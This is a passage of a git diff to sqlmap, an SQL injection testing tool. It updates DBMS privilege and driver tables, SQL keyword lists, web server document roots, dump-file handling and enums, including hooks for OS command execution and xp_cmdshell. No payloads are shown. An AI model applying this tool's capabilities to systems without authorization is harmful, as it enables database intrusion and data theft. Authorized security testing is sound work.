- "M": "MEMBER", - "T": "DECRYPT", - "E": "ENCRYPT", - "B": "SUBSCRIBE", - } + "S": "SELECT", + "I": "INSERT", + "U": "UPDATE", + "D": "DELETE", + "R": "REFERENCE", + "X": "EXECUTE", + "A": "ALL", + "M": "MEMBER", + "T": "DECRYPT", + "E": "ENCRYPT", + "B": "SUBSCRIBE", +} + +# Reference(s): https://www.ibm.com/support/knowledgecenter/SSGU8G_12.1.0/com.ibm.sqls.doc/ids_sqs_0147.htm +# https://www.ibm.com/support/knowledgecenter/SSGU8G_11.70.0/com.ibm.sqlr.doc/ids_sqr_077.htm + +INFORMIX_PRIVS = { + "D": "DBA (all privileges)", + "R": "RESOURCE (create UDRs, UDTs, permanent tables and indexes)", + "C": "CONNECT (work with existing tables)", + "G": "ROLE", + "U": "DEFAULT (implicit connection)", +} DB2_PRIVS = { - 1: "CONTROLAUTH", - 2: "ALTERAUTH", - 3: "DELETEAUTH", - 4: "INDEXAUTH", - 5: "INSERTAUTH", - 6: "REFAUTH", - 7: "SELECTAUTH", - 8: "UPDATEAUTH", - } + 1: "CONTROLAUTH", + 2: "ALTERAUTH", + 3: "DELETEAUTH", + 4: "INDEXAUTH", + 5: "INSERTAUTH", + 6: "REFAUTH", + 7: "SELECTAUTH", + 8: "UPDATEAUTH", +} DUMP_REPLACEMENTS = {" ": NULL, "": BLANK} DBMS_DICT = { - DBMS.MSSQL: (MSSQL_ALIASES, "python-pymssql", "http://pymssql.sourceforge.net/", "mssql+pymssql"), - DBMS.MYSQL: (MYSQL_ALIASES, "python pymysql", "https://github.com/petehunt/PyMySQL/", "mysql"), - DBMS.PGSQL: (PGSQL_ALIASES, "python-psycopg2", "http://initd.org/psycopg/", "postgresql"), - DBMS.ORACLE: (ORACLE_ALIASES, "python cx_Oracle", "http://cx-oracle.sourceforge.net/", "oracle"), - DBMS.SQLITE: (SQLITE_ALIASES, "python-sqlite", "http://packages.ubuntu.com/quantal/python-sqlite", "sqlite"), - DBMS.ACCESS: (ACCESS_ALIASES, "python-pyodbc", "http://pyodbc.googlecode.com/", "access"), - DBMS.FIREBIRD: (FIREBIRD_ALIASES, "python-kinterbasdb", "http://kinterbasdb.sourceforge.net/", "firebird"), - DBMS.MAXDB: (MAXDB_ALIASES, None, None, "maxdb"), - DBMS.SYBASE: (SYBASE_ALIASES, "python-pymssql", "http://pymssql.sourceforge.net/", "sybase"), - DBMS.DB2: (DB2_ALIASES, "python ibm-db", "http://code.google.com/p/ibm-db/", "ibm_db_sa"), - DBMS.HSQLDB: (HSQLDB_ALIASES, "python jaydebeapi & python-jpype", "https://pypi.python.org/pypi/JayDeBeApi/ & http://jpype.sourceforge.net/", None), - } + DBMS.MSSQL: (MSSQL_ALIASES, "python-pymssql", "https://github.com/pymssql/pymssql", "mssql+pymssql"), + DBMS.MYSQL: (MYSQL_ALIASES, "python-pymysql", "https://github.com/petehunt/PyMySQL/", "mysql"), + DBMS.PGSQL: (PGSQL_ALIASES, "python-psycopg2", "http://initd.org/psycopg/", "postgresql"), + DBMS.ORACLE: (ORACLE_ALIASES, "python cx_Oracle", "http://cx-oracle.sourceforge.net/", "oracle"), + DBMS.SQLITE: (SQLITE_ALIASES, "python-sqlite", "http://packages.ubuntu.com/quantal/python-sqlite", "sqlite"), + DBMS.ACCESS: (ACCESS_ALIASES, "python-pyodbc", "https://github.com/mkleehammer/pyodbc", "access"), + DBMS.FIREBIRD: (FIREBIRD_ALIASES, "python-kinterbasdb", "http://kinterbasdb.sourceforge.net/", "firebird"), + DBMS.MAXDB: (MAXDB_ALIASES, None, None, "maxdb"), + DBMS.SYBASE: (SYBASE_ALIASES, "python-pymssql", "https://github.com/pymssql/pymssql", "sybase"), + DBMS.DB2: (DB2_ALIASES, "python ibm-db", "https://github.com/ibmdb/python-ibmdb", "ibm_db_sa"), + DBMS.HSQLDB: (HSQLDB_ALIASES, "python jaydebeapi & python-jpype", "https://pypi.python.org/pypi/JayDeBeApi/ & http://jpype.sourceforge.net/", None), + DBMS.INFORMIX: (INFORMIX_ALIASES, "python ibm-db", "https://github.com/ibmdb/python-ibmdb", "ibm_db_sa"), +} FROM_DUMMY_TABLE = { - DBMS.ORACLE: " FROM DUAL", - DBMS.ACCESS: " FROM MSysAccessObjects", - DBMS.FIREBIRD: " FROM RDB$DATABASE", - DBMS.MAXDB: " FROM VERSIONS", - DBMS.DB2: " FROM SYSIBM.SYSDUMMY1", - DBMS.HSQLDB: " FROM INFORMATION_SCHEMA.SYSTEM_USERS" - } + DBMS.ORACLE: " FROM DUAL", + DBMS.ACCESS: " FROM MSysAccessObjects", + DBMS.FIREBIRD: " FROM RDB$DATABASE", + DBMS.MAXDB: " FROM VERSIONS", + DBMS.DB2: " FROM SYSIBM.SYSDUMMY1", + DBMS.HSQLDB: " FROM INFORMATION_SCHEMA.SYSTEM_USERS", + DBMS.INFORMIX: " FROM SYSMASTER:SYSDUAL" +} SQL_STATEMENTS = { - "SQL SELECT statement": ( - "select ", - "show ", - " top ", - " distinct ", - " from ", - " from dual", - " where ", - " group by ", - " order by ", - " having ", - " limit ", - " offset ", - " union all ", - " rownum as ", - "(case ", ), + "SQL SELECT statement": ( + "select ", + "show ", + " top ", + " distinct ", + " from ", + " from dual", + " where ", + " group by ", + " order by ", + " having ", + " limit ", + " offset ", + " union all ", + " rownum as ", + "(case ", ), - "SQL data definition": ( - "create ", - "declare ", - "drop ", - "truncate ", - "alter ", ), + "SQL data definition": ( + "create ", + "declare ", + "drop ", + "truncate ", + "alter ", ), - "SQL data manipulation": ( - "bulk ", - "insert ", - "update ", - "delete ", - "merge ", - "load ", ), + "SQL data manipulation": ( + "bulk ", + "insert ", + "update ", + "delete ", + "merge ", + "load ", ), - "SQL data control": ( - "grant ", - "revoke ", ), + "SQL data control": ( + "grant ", + "revoke ", ), - "SQL data execution": ( - "exec ", - "execute ", - "values ", - "call ", ), + "SQL data execution": ( + "exec ", + "execute ", + "values ", + "call ", ), - "SQL transaction": ( - "start transaction ", - "begin work ", - "begin transaction ", - "commit ", - "rollback ", ), - } + "SQL transaction": ( + "start transaction ", + "begin work ", + "begin transaction ", + "commit ", + "rollback ", ), +} POST_HINT_CONTENT_TYPES = { - POST_HINT.JSON: "application/json", - POST_HINT.JSON_LIKE: "application/json", - POST_HINT.MULTIPART: "multipart/form-data", - POST_HINT.SOAP: "application/soap+xml", - POST_HINT.XML: "application/xml", - POST_HINT.ARRAY_LIKE: "application/x-www-form-urlencoded; charset=utf-8", - } + POST_HINT.JSON: "application/json", + POST_HINT.JSON_LIKE: "application/json", + POST_HINT.MULTIPART: "multipart/form-data", + POST_HINT.SOAP: "application/soap+xml", + POST_HINT.XML: "application/xml", + POST_HINT.ARRAY_LIKE: "application/x-www-form-urlencoded; charset=utf-8", +} DEPRECATED_OPTIONS = { - "--replicate": "use '--dump-format=SQLITE' instead", - "--no-unescape": "use '--no-escape' instead", - "--binary": "use '--binary-fields' instead", - "--check-payload": None, - "--check-waf": None, - } + "--replicate": "use '--dump-format=SQLITE' instead", + "--no-unescape": "use '--no-escape' instead", + "--binary": "use '--binary-fields' instead", + "--auth-private": "use '--auth-file' instead", + "--check-payload": None, + "--check-waf": None, + "--pickled-options": "use '--api -c ...' instead", +} DUMP_DATA_PREPROCESS = { - DBMS.ORACLE: {"XMLTYPE": "(%s).getStringVal()"}, # Reference: https://www.tibcommunity.com/docs/DOC-3643 - DBMS.MSSQL: {"IMAGE": "CONVERT(VARBINARY(MAX),%s)"}, - } + DBMS.ORACLE: {"XMLTYPE": "(%s).getStringVal()"}, # Reference: https://www.tibcommunity.com/docs/DOC-3643 + DBMS.MSSQL: {"IMAGE": "CONVERT(VARBINARY(MAX),%s)"}, +} DEFAULT_DOC_ROOTS = { - OS.WINDOWS: ("C:/xampp/htdocs/", "C:/Inetpub/wwwroot/"), - OS.LINUX: ("/var/www/", "/var/www/html", "/usr/local/apache2/htdocs", "/var/www/nginx-default") # Reference: https://wiki.apache.org/httpd/DistrosDefaultLayout - } + OS.WINDOWS: ("C:/xampp/htdocs/", "C:/wamp/www/", "C:/Inetpub/wwwroot/"), + OS.LINUX: ("/var/www/", "/var/www/html", "/usr/local/apache2/htdocs", "/var/www/nginx-default", "/srv/www") # Reference: https://wiki.apache.org/httpd/DistrosDefaultLayout +} diff --git a/lib/core/dump.py b/lib/core/dump.py index 4401f1742..108f806b2 100644 --- a/lib/core/dump.py +++ b/lib/core/dump.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ @@ -9,12 +9,15 @@ import cgi import hashlib import os import re +import shutil import tempfile import threading from lib.core.common import Backend +from lib.core.common import checkFile from lib.core.common import dataToDumpFile from lib.core.common import dataToStdout +from lib.core.common import getSafeExString from lib.core.common import getUnicode from lib.core.common import isListLike from lib.core.common import normalizeUnicode @@ -36,6 +39,7 @@ from lib.core.exception import SqlmapGenericException from lib.core.exception import SqlmapValueException from lib.core.exception import SqlmapSystemException from lib.core.replication import Replication +from lib.core.settings import DUMP_FILE_BUFFER_SIZE from lib.core.settings import HTML_DUMP_CSS_STYLE from lib.core.settings import IS_WIN from lib.core.settings import METADB_SUFFIX @@ -59,7 +63,7 @@ class Dump(object): self._lock = threading.Lock() def _write(self, data, newline=True, console=True, content_type=None): - if hasattr(conf, "api"): + if conf.api: dataToStdout(data, content_type=content_type, status=CONTENT_STATUS.COMPLETE) return @@ -74,7 +78,7 @@ class Dump(object): try: self._outputFP.write(text) except IOError, ex: - errMsg = "error occurred while writing to log file ('%s')" % ex.message + errMsg = "error occurred while writing to log file ('%s')" % getSafeExString(ex) raise SqlmapGenericException(errMsg) if kb.get("multiThreadMode"): @@ -94,7 +98,7 @@ class Dump(object): try: self._outputFP = openFile(self._outputFile, "ab" if not conf.flushSession else "wb") except IOError, ex: - errMsg = "error occurred while opening log file ('%s')" % ex.message + errMsg = "error occurred while opening log file ('%s')" % getSafeExString(ex) raise SqlmapGenericException(errMsg) def getOutputFile(self): @@ -106,7 +110,7 @@ class Dump(object): def string(self, header, data, content_type=None, sort=True): kb.stickyLevel = None - if hasattr(conf, "api"): + if conf.api: self._write(data, content_type=content_type) return @@ -115,9 +119,15 @@ class Dump(object): elif data is not None: _ = getUnicode(data) - if _ and _[-1] == '\n': + if _.endswith("\r\n"): + _ = _[:-2] + + elif _.endswith("\n"): _ = _[:-1] + if _.strip(' '): + _ = _.strip(' ') + if "\n" in _: self._write("%s:\n---\n%s\n---" % (header, _)) else: @@ -134,7 +144,7 @@ class Dump(object): except: pass - if hasattr(conf, "api"): + if conf.api: self._write(elements, content_type=content_type) return @@ -159,7 +169,7 @@ class Dump(object): def currentDb(self, data): if Backend.isDbms(DBMS.MAXDB): self.string("current database (no practical usage on %s)" % Backend.getIdentifiedDbms(), data, content_type=CONTENT_TYPE.CURRENT_DB) - elif Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.PGSQL): + elif Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.PGSQL, DBMS.HSQLDB): self.string("current schema (equivalent to database on %s)" % Backend.getIdentifiedDbms(), data, content_type=CONTENT_TYPE.CURRENT_DB) else: self.string("current database", data, content_type=CONTENT_TYPE.CURRENT_DB) @@ -183,7 +193,7 @@ class Dump(object): users = userSettings.keys() users.sort(key=lambda x: x.lower() if isinstance(x, basestring) else x) - if hasattr(conf, "api"): + if conf.api: self._write(userSettings, content_type=content_type) return @@ -217,7 +227,7 @@ class Dump(object): def dbTables(self, dbTables): if isinstance(dbTables, dict) and len(dbTables) > 0: - if hasattr(conf, "api"): + if conf.api: self._write(dbTables, content_type=CONTENT_TYPE.TABLES) return @@ -260,7 +270,7 @@ class Dump(object): def dbTableColumns(self, tableColumns, content_type=None): if isinstance(tableColumns, dict) and len(tableColumns) > 0: - if hasattr(conf, "api"): + if conf.api: self._write(tableColumns, content_type=content_type) return @@ -334,7 +344,7 @@ class Dump(object): def dbTablesCount(self, dbTables): if isinstance(dbTables, dict) and len(dbTables) > 0: - if hasattr(conf, "api"): + if conf.api: self._write(dbTables, content_type=CONTENT_TYPE.COUNT) return @@ -393,17 +403,11 @@ class Dump(object): db = "All" table = tableValues["__infos__"]["table"] - if hasattr(conf, "api"): + if conf.api: self._write(tableValues, content_type=CONTENT_TYPE.DUMP_TABLE) return - _ = re.sub(r"[^\w]", "_", normalizeUnicode(unsafeSQLIdentificatorNaming(db))) - if len(_) < len(db) or IS_WIN and db.upper() in WINDOWS_RESERVED_NAMES: - _ = unicodeencode(re.sub(r"[^\w]", "_", unsafeSQLIdentificatorNaming(db))) - dumpDbPath = os.path.join(conf.dumpPath, "%s-%s" % (_, hashlib.md5(unicodeencode(db)).hexdigest()[:8])) - warnFile = True - else: - dumpDbPath = os.path.join(conf.dumpPath, _) + dumpDbPath = os.path.join(conf.dumpPath, unsafeSQLIdentificatorNaming(db)) if conf.dumpFormat == DUMP_FORMAT.SQLITE: replication = Replication(os.path.join(conf.dumpPath, "%s.sqlite3" % unsafeSQLIdentificatorNaming(db))) @@ -411,33 +415,65 @@ class Dump(object): if not os.path.isdir(dumpDbPath): try: os.makedirs(dumpDbPath, 0755) - except (OSError, IOError), ex: - try: - tempDir = tempfile.mkdtemp(prefix="sqlmapdb") - except IOError, _: - errMsg = "unable to write to the temporary directory ('%s'). " % _ - errMsg += "Please make sure that your disk is not full and " - errMsg += "that you have sufficient write permissions to " - errMsg += "create temporary files and/or directories" - raise SqlmapSystemException(errMsg) + except: + warnFile = True - warnMsg = "unable to create dump directory " - warnMsg += "'%s' (%s). " % (dumpDbPath, ex) - warnMsg += "Using temporary directory '%s' instead" % tempDir - logger.warn(warnMsg) + _ = unicodeencode(re.sub(r"[^\w]", "_", unsafeSQLIdentificatorNaming(db))) + dumpDbPath = os.path.join(conf.dumpPath, "%s-%s" % (_, hashlib.md5(unicodeencode(db)).hexdigest()[:8])) - dumpDbPath = tempDir + if not os.path.isdir(dumpDbPath): + try: + os.makedirs(dumpDbPath, 0755) + except Exception, ex: + try: + tempDir = tempfile.mkdtemp(prefix="sqlmapdb") + except IOError, _: + errMsg = "unable to write to the temporary directory ('%s'). " % _ + errMsg += "Please make sure that your disk is not full and " + errMsg += "that you have sufficient write permissions to " + errMsg += "create temporary files and/or directories" + raise SqlmapSystemException(errMsg) - _ = re.sub(r"[^\w]", "_", normalizeUnicode(unsafeSQLIdentificatorNaming(table))) - if len(_) < len(table) or IS_WIN and table.upper() in WINDOWS_RESERVED_NAMES: - _ = unicodeencode(re.sub(r"[^\w]", "_", unsafeSQLIdentificatorNaming(table))) - dumpFileName = os.path.join(dumpDbPath, "%s-%s.%s" % (_, hashlib.md5(unicodeencode(table)).hexdigest()[:8], conf.dumpFormat.lower())) - warnFile = True + warnMsg = "unable to create dump directory " + warnMsg += "'%s' (%s). " % (dumpDbPath, getSafeExString(ex)) + warnMsg += "Using temporary directory '%s' instead" % tempDir + logger.warn(warnMsg) + + dumpDbPath = tempDir + + dumpFileName = os.path.join(dumpDbPath, "%s.%s" % (unsafeSQLIdentificatorNaming(table), conf.dumpFormat.lower())) + if not checkFile(dumpFileName, False): + try: + openFile(dumpFileName, "w+b").close() + except SqlmapSystemException: + raise + except: + warnFile = True + + _ = re.sub(r"[^\w]", "_", normalizeUnicode(unsafeSQLIdentificatorNaming(table))) + if len(_) < len(table) or IS_WIN and table.upper() in WINDOWS_RESERVED_NAMES: + _ = unicodeencode(re.sub(r"[^\w]", "_", unsafeSQLIdentificatorNaming(table))) + dumpFileName = os.path.join(dumpDbPath, "%s-%s.%s" % (_, hashlib.md5(unicodeencode(table)).hexdigest()[:8], conf.dumpFormat.lower())) + else: + dumpFileName = os.path.join(dumpDbPath, "%s.%s" % (_, conf.dumpFormat.lower())) else: - dumpFileName = os.path.join(dumpDbPath, "%s.%s" % (_, conf.dumpFormat.lower())) + appendToFile = any((conf.limitStart, conf.limitStop)) - appendToFile = os.path.isfile(dumpFileName) and any((conf.limitStart, conf.limitStop)) - dumpFP = openFile(dumpFileName, "wb" if not appendToFile else "ab") + if not appendToFile: + count = 1 + while True: + candidate = "%s.%d" % (dumpFileName, count) + if not checkFile(candidate, False): + try: + shutil.copyfile(dumpFileName, candidate) + except IOError: + pass + finally: + break + else: + count += 1 + + dumpFP = openFile(dumpFileName, "wb" if not appendToFile else "ab", buffering=DUMP_FILE_BUFFER_SIZE) count = int(tableValues["__infos__"]["count"]) separator = str() @@ -577,7 +613,8 @@ class Dump(object): if not os.path.isdir(dumpDbPath): os.makedirs(dumpDbPath, 0755) - filepath = os.path.join(dumpDbPath, "%s-%d.bin" % (unsafeSQLIdentificatorNaming(column), randomInt(8))) + _ = re.sub(r"[^\w]", "_", normalizeUnicode(unsafeSQLIdentificatorNaming(column))) + filepath = os.path.join(dumpDbPath, "%s-%d.bin" % (_, randomInt(8))) warnMsg = "writing binary ('%s') content to file '%s' " % (mimetype, filepath) logger.warn(warnMsg) @@ -629,17 +666,17 @@ class Dump(object): logger.warn(msg) def dbColumns(self, dbColumnsDict, colConsider, dbs): - if hasattr(conf, "api"): + if conf.api: self._write(dbColumnsDict, content_type=CONTENT_TYPE.COLUMNS) return for column in dbColumnsDict.keys(): if colConsider == "1": - colConsiderStr = "s like '%s' were" % unsafeSQLIdentificatorNaming(column) + colConsiderStr = "s LIKE '%s' were" % unsafeSQLIdentificatorNaming(column) else: colConsiderStr = " '%s' was" % unsafeSQLIdentificatorNaming(column) - msg = "Column%s found in the " % colConsiderStr + msg = "column%s found in the " % colConsiderStr msg += "following databases:" self._write(msg) diff --git a/lib/core/enums.py b/lib/core/enums.py index cb1b7b36f..9339b8ed4 100644 --- a/lib/core/enums.py +++ b/lib/core/enums.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ @@ -34,6 +34,7 @@ class DBMS: SQLITE = "SQLite" SYBASE = "Sybase" HSQLDB = "HSQLDB" + INFORMIX = "Informix" class DBMS_DIRECTORY_NAME: ACCESS = "access" @@ -47,6 +48,7 @@ class DBMS_DIRECTORY_NAME: SQLITE = "sqlite" SYBASE = "sybase" HSQLDB = "hsqldb" + INFORMIX = "informix" class CUSTOM_LOGGING: PAYLOAD = 9 @@ -81,7 +83,7 @@ class HTTPMETHOD: POST = "POST" HEAD = "HEAD" PUT = "PUT" - DELETE = "DETELE" + DELETE = "DELETE" TRACE = "TRACE" OPTIONS = "OPTIONS" CONNECT = "CONNECT" @@ -164,19 +166,24 @@ class HTTP_HEADER: CONTENT_RANGE = "Content-Range" CONTENT_TYPE = "Content-Type" COOKIE = "Cookie" - SET_COOKIE = "Set-Cookie" + EXPIRES = "Expires" HOST = "Host" + IF_MODIFIED_SINCE = "If-Modified-Since" + LAST_MODIFIED = "Last-Modified" LOCATION = "Location" PRAGMA = "Pragma" PROXY_AUTHORIZATION = "Proxy-Authorization" PROXY_CONNECTION = "Proxy-Connection" RANGE = "Range" REFERER = "Referer" + REFRESH = "Refresh" # Reference: http://stackoverflow.com/a/283794 SERVER = "Server" - USER_AGENT = "User-Agent" + SET_COOKIE = "Set-Cookie" TRANSFER_ENCODING = "Transfer-Encoding" URI = "URI" + USER_AGENT = "User-Agent" VIA = "Via" + X_POWERED_BY = "X-Powered-By" class EXPECTED: BOOL = "bool" @@ -190,6 +197,8 @@ class OPTION_TYPE: class HASHDB_KEYS: DBMS = "DBMS" + DBMS_FORK = "DBMS_FORK" + CHECK_WAF_RESULT = "CHECK_WAF_RESULT" CONF_TMP_PATH = "CONF_TMP_PATH" KB_ABS_FILE_PATHS = "KB_ABS_FILE_PATHS" KB_BRUTE_COLUMNS = "KB_BRUTE_COLUMNS" @@ -197,6 +206,7 @@ class HASHDB_KEYS: KB_CHARS = "KB_CHARS" KB_DYNAMIC_MARKINGS = "KB_DYNAMIC_MARKINGS" KB_INJECTIONS = "KB_INJECTIONS" + KB_ERROR_CHUNK_LENGTH = "KB_ERROR_CHUNK_LENGTH" KB_XP_CMDSHELL_AVAILABLE = "KB_XP_CMDSHELL_AVAILABLE" OS = "OS" @@ -277,31 +287,32 @@ class WEB_API: JSP = "jsp" class CONTENT_TYPE: - TECHNIQUES = 0 - DBMS_FINGERPRINT = 1 - BANNER = 2 - CURRENT_USER = 3 - CURRENT_DB = 4 - HOSTNAME = 5 - IS_DBA = 6 - USERS = 7 - PASSWORDS = 8 - PRIVILEGES = 9 - ROLES = 10 - DBS = 11 - TABLES = 12 - COLUMNS = 13 - SCHEMA = 14 - COUNT = 15 - DUMP_TABLE = 16 - SEARCH = 17 - SQL_QUERY = 18 - COMMON_TABLES = 19 - COMMON_COLUMNS = 20 - FILE_READ = 21 - FILE_WRITE = 22 - OS_CMD = 23 - REG_READ = 24 + TARGET = 0 + TECHNIQUES = 1 + DBMS_FINGERPRINT = 2 + BANNER = 3 + CURRENT_USER = 4 + CURRENT_DB = 5 + HOSTNAME = 6 + IS_DBA = 7 + USERS = 8 + PASSWORDS = 9 + PRIVILEGES = 10 + ROLES = 11 + DBS = 12 + TABLES = 13 + COLUMNS = 14 + SCHEMA = 15 + COUNT = 16 + DUMP_TABLE = 17 + SEARCH = 18 + SQL_QUERY = 19 + COMMON_TABLES = 20 + COMMON_COLUMNS = 21 + FILE_READ = 22 + FILE_WRITE = 23 + OS_CMD = 24 + REG_READ = 25 PART_RUN_CONTENT_TYPES = { "checkDbms": CONTENT_TYPE.TECHNIQUES, @@ -345,3 +356,21 @@ class AUTOCOMPLETE_TYPE: SQL = 0 OS = 1 SQLMAP = 2 + +class NOTE: + FALSE_POSITIVE_OR_UNEXPLOITABLE = "false positive or unexploitable" + +class MKSTEMP_PREFIX: + HASHES = "sqlmaphashes-" + CRAWLER = "sqlmapcrawler-" + IPC = "sqlmapipc-" + CONFIG = "sqlmapconfig-" + TESTING = "sqlmaptesting-" + RESULTS = "sqlmapresults-" + COOKIE_JAR = "sqlmapcookiejar-" + BIG_ARRAY = "sqlmapbigarray-" + +class TIMEOUT_STATE: + NORMAL = 0 + EXCEPTION = 1 + TIMEOUT = 2 diff --git a/lib/core/exception.py b/lib/core/exception.py index faeff7c41..ffb1ab067 100644 --- a/lib/core/exception.py +++ b/lib/core/exception.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/lib/core/log.py b/lib/core/log.py index 3d3328545..7f42ecbe6 100644 --- a/lib/core/log.py +++ b/lib/core/log.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/lib/core/option.py b/lib/core/option.py old mode 100644 new mode 100755 index 896446cd0..ebf958470 --- a/lib/core/option.py +++ b/lib/core/option.py @@ -1,10 +1,11 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ +import binascii import cookielib import glob import inspect @@ -27,6 +28,7 @@ import lib.core.common import lib.core.threads import lib.core.convert import lib.request.connect +import lib.utils.search from lib.controller.checks import checkConnection from lib.core.common import Backend @@ -34,14 +36,15 @@ from lib.core.common import boldifyMessage from lib.core.common import checkFile from lib.core.common import dataToStdout from lib.core.common import getPublicTypeMembers +from lib.core.common import getSafeExString from lib.core.common import extractRegexResult from lib.core.common import filterStringValue +from lib.core.common import findLocalPort from lib.core.common import findPageForms from lib.core.common import getConsoleWidth from lib.core.common import getFileItems from lib.core.common import getFileType from lib.core.common import getUnicode -from lib.core.common import isListLike from lib.core.common import normalizePath from lib.core.common import ntToPosixSlashes from lib.core.common import openFile @@ -54,12 +57,11 @@ from lib.core.common import readInput from lib.core.common import resetCookieJar from lib.core.common import runningAsAdmin from lib.core.common import safeExpandUser +from lib.core.common import saveConfig from lib.core.common import setOptimize from lib.core.common import setPaths from lib.core.common import singleTimeWarnMessage -from lib.core.common import UnicodeRawConfigParser from lib.core.common import urldecode -from lib.core.convert import base64unpickle from lib.core.data import conf from lib.core.data import kb from lib.core.data import logger @@ -90,6 +92,7 @@ from lib.core.exception import SqlmapInstallationException from lib.core.exception import SqlmapMissingDependence from lib.core.exception import SqlmapMissingMandatoryOptionException from lib.core.exception import SqlmapMissingPrivileges +from lib.core.exception import SqlmapNoneDataException from lib.core.exception import SqlmapSilentQuitException from lib.core.exception import SqlmapSyntaxException from lib.core.exception import SqlmapSystemException @@ -105,7 +108,7 @@ from lib.core.settings import CUSTOM_INJECTION_MARK_CHAR from lib.core.settings import DBMS_ALIASES from lib.core.settings import DEFAULT_PAGE_ENCODING from lib.core.settings import DEFAULT_TOR_HTTP_PORTS -from lib.core.settings import DEFAULT_TOR_SOCKS_PORT +from lib.core.settings import DEFAULT_TOR_SOCKS_PORTS from lib.core.settings import DUMMY_URL from lib.core.settings import INJECT_HERE_MARK from lib.core.settings import IS_WIN @@ -116,18 +119,22 @@ from lib.core.settings import MAX_CONNECT_RETRIES from lib.core.settings import MAX_NUMBER_OF_THREADS from lib.core.settings import NULL from lib.core.settings import PARAMETER_SPLITTING_REGEX +from lib.core.settings import PRECONNECT_CANDIDATE_TIMEOUT from lib.core.settings import PROBLEMATIC_CUSTOM_INJECTION_PATTERNS from lib.core.settings import SITE +from lib.core.settings import SOCKET_PRE_CONNECT_QUEUE_SIZE from lib.core.settings import SQLMAP_ENVIRONMENT_PREFIX from lib.core.settings import SUPPORTED_DBMS from lib.core.settings import SUPPORTED_OS from lib.core.settings import TIME_DELAY_CANDIDATES +from lib.core.settings import UNICODE_ENCODING from lib.core.settings import UNION_CHAR_REGEX from lib.core.settings import UNKNOWN_DBMS_VERSION from lib.core.settings import URI_INJECTABLE_REGEX from lib.core.settings import VERSION_STRING from lib.core.settings import WEBSCARAB_SPLITTER from lib.core.threads import getCurrentThreadData +from lib.core.threads import setDaemon from lib.core.update import update from lib.parse.configfile import configFileParser from lib.parse.payloads import loadBoundaries @@ -142,12 +149,13 @@ from lib.request.pkihandler import HTTPSPKIAuthHandler from lib.request.rangehandler import HTTPRangeHandler from lib.request.redirecthandler import SmartRedirectHandler from lib.request.templates import getPageTemplate +from lib.utils.har import HTTPCollectorFactory from lib.utils.crawler import crawl from lib.utils.deps import checkDependencies -from lib.utils.google import Google +from lib.utils.search import search from lib.utils.purge import purge -from thirdparty.colorama.initialise import init as coloramainit from thirdparty.keepalive import keepalive +from thirdparty.multipart import multipartpost from thirdparty.oset.pyoset import oset from thirdparty.socks import socks from xml.etree.ElementTree import ElementTree @@ -158,42 +166,13 @@ keepAliveHandler = keepalive.HTTPHandler() proxyHandler = urllib2.ProxyHandler() redirectHandler = SmartRedirectHandler() rangeHandler = HTTPRangeHandler() +multipartPostHandler = multipartpost.MultipartPostHandler() -def _urllib2Opener(): - """ - This function creates the urllib2 OpenerDirector. - """ - - debugMsg = "creating HTTP requests opener object" - logger.debug(debugMsg) - - handlers = [proxyHandler, authHandler, redirectHandler, rangeHandler, httpsHandler] - - if not conf.dropSetCookie: - if not conf.loadCookies: - conf.cj = cookielib.CookieJar() - else: - conf.cj = cookielib.MozillaCookieJar() - resetCookieJar(conf.cj) - - handlers.append(urllib2.HTTPCookieProcessor(conf.cj)) - - # Reference: http://www.w3.org/Protocols/rfc2616/rfc2616-sec8.html - if conf.keepAlive: - warnMsg = "persistent HTTP(s) connections, Keep-Alive, has " - warnMsg += "been disabled because of its incompatibility " - - if conf.proxy: - warnMsg += "with HTTP(s) proxy" - logger.warn(warnMsg) - elif conf.authType: - warnMsg += "with authentication methods" - logger.warn(warnMsg) - else: - handlers.append(keepAliveHandler) - - opener = urllib2.build_opener(*handlers) - urllib2.install_opener(opener) +# Reference: https://mail.python.org/pipermail/python-list/2009-November/558615.html +try: + WindowsError +except NameError: + WindowsError = None def _feedTargetsDict(reqFile, addedTargetUrls): """ @@ -238,7 +217,10 @@ def _feedTargetsDict(reqFile, addedTargetUrls): reqResList = [] for match in re.finditer(BURP_XML_HISTORY_REGEX, content, re.I | re.S): port, request = match.groups() - request = request.decode("base64") + try: + request = request.decode("base64") + except binascii.Error: + continue _ = re.search(r"%s:.+" % re.escape(HTTP_HEADER.HOST), request) if _: host = _.group(0).strip() @@ -259,6 +241,7 @@ def _feedTargetsDict(reqFile, addedTargetUrls): if schemePort: scheme = schemePort.group(1) port = schemePort.group(2) + request = re.sub(r"\n=+\Z", "", request.split(schemePort.group(0))[-1].lstrip()) else: scheme, port = None, None @@ -311,8 +294,9 @@ def _feedTargetsDict(reqFile, addedTargetUrls): params = True # Headers - elif re.search(r"\A\S+: ", line): - key, value = line.split(": ", 1) + elif re.search(r"\A\S+:", line): + key, value = line.split(":", 1) + value = value.strip().replace("\r", "").replace("\n", "") # Cookie and Host headers if key.upper() == HTTP_HEADER.COOKIE.upper(): @@ -362,7 +346,7 @@ def _feedTargetsDict(reqFile, addedTargetUrls): if not(conf.scope and not re.search(conf.scope, url, re.I)): if not kb.targets or url not in addedTargetUrls: - kb.targets.add((url, method, data, cookie, tuple(headers))) + kb.targets.add((url, conf.method or method, data, cookie, tuple(headers))) addedTargetUrls.add(url) checkFile(reqFile) @@ -371,7 +355,7 @@ def _feedTargetsDict(reqFile, addedTargetUrls): content = f.read() except (IOError, 